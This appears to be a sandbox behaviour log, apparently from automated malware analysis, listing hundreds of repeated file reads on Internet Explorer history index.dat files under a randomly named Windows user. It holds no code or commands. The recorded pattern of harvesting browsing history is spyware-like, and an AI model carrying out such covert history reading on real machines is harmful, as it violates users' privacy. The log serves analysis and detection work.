| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
23 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
